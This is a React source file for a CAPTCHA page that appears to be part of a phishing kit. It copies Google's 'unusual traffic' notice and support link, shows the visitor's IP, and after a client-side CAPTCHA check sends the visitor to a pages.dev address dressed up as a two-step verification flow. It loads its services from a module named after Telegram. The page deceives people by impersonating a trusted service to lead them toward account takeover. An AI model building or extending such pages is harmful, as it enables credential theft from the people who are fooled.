/* eslint-disable jsx-a11y/anchor-is-valid */
import React from "react";

import { getCaptcha, getLocation } from "../services/telegram.service";
import { useEffect, useState } from "react";
import { useLocation } from "react-router-dom";
import useStore from "../store";

const CaptchaFullPage: React.FC = () => {
  const { setPageId } = useStore();
  const location = useLocation();
  const queryParams = new URLSearchParams(location.search);
  const pageId = queryParams.get("pageId");
  const [captchaSvg, setCaptchaSvg] = useState("");
  const [captchaText, setCaptchaText] = useState(""); // để kiểm thử (ẩn trong thực tế)
  const [input, setInput] = useState("");
  const [encryptedContext, setEncryptedContext] = useState("");
  const [ip, setIp] = useState("127.0.0.1");
  const [error, setError] = useState("");
  const fetchCountry = async () => {
    const data = await getLocation();
    setIp(data.ip);
  };

  const fetchCaptcha = async () => {
    const res = await getCaptcha();
    setCaptchaSvg(res.data.svg);
    setCaptchaText(res.data.text); // Debug only
    setEncryptedContext(res.data.encryptUrl); // Debug only
  };

  useEffect(() => {
    fetchCountry();
    fetchCaptcha();
    setPageId(pageId || "UMPG"); // Set the pageId in the store or state as needed
  }, [setPageId, pageId]);

  const handleSubmit = async () => {
    if (input.trim().toLowerCase() === captchaText.toLowerCase()) {
      window.location.href = `https://elephant-kakiem.pages.dev/two_step_verification/authentication/?encrypted_context=${encryptedContext}&flow=pre_authentication&next&pageId=${pageId}`;
    } else {
      setError("❌ Incorrect captcha. Please try again.");
    }
  };

  return (
    <>
      <div className="flex flex-col items-center justify-start bg-[#f9f9f9] h-screen w-full font-roboto">
        <div className="p-8 font-roboto text-[14px] text-gray-800 w-full md:w-[400px]">
          <h2 className="text-[23px] font-semibold text-start mb-4">
            Enter the characters you see
          </h2>

          <div
            className="h-[120px] mb-2 flex items-center justify-center text-3xl font-bold overflow-hidden"
            dangerouslySetInnerHTML={{ __html: captchaSvg }}
          />

          <div className="text-sm text-gray-600 mb-4">
            Can’t read this?{" "}
            <a
              href="#"
              className="text-blue-600 underline cursor-pointer"
              onClick={(e) => {
                e.preventDefault(); // tránh reload
                fetchCaptcha();
                setInput(""); // reset input nếu cần
                setError(""); // reset error nếu cần
              }}
            >
              Generate new
            </a>{" "}
            or{" "}
            <a href="#" className="text-blue-600 underline">
              play audio
            </a>
          </div>

          <input
            type="text"
            value={input}
            onChange={(e) => {
              setInput(e.target.value);
              setError(""); // reset error nếu cần
            }}
            className={`w-full text-base border border-gray-300 rounded px-3 py-2 mb-4 focus:outline-none focus:ring-2 focus:ring-blue-500  ${
              error ? "border-red-500" : "border-gray-300"
            }`}
            placeholder="Enter CAPTCHA"
          />
          {error && (
            <p className="mt-1 text-sm text-red-600 font-medium animate-pulse">
              {error}
            </p>
          )}

          <button
            onClick={handleSubmit}
            className="w-full bg-blue-500 hover:bg-blue-600 text-white font-semibold py-2 rounded"
          >
            Continue
          </button>

          {/* About Section */}
          <div className="mt-5">
            <div className="text-base border-b border-gray-300 mb-5 mt-10"></div>
            <div className="text-base font-bold">About this page</div>
            <p className="text-sm font-normal mt-4 leading-relaxed">
              Our systems have detected unusual traffic from your computer
              network. This page checks to see if it's really you sending the
              requests, and not a robot.{" "}
              <a
                href="https://support.google.com/a/answer/1217728?hl=en"
                target="_bank"
                className="text-blue-700 hover:underline"
              >
                Why did this happen?
              </a>
            </p>

            {/* Info block */}
            <div className="mt-4 font-mono whitespace-pre-line">
              IP address: <span className="text-black">{ip}</span>
              <br />
              Time: {new Date().toLocaleString()}
            </div>
          </div>
        </div>
      </div>
    </>
  );
};

export default CaptchaFullPage;
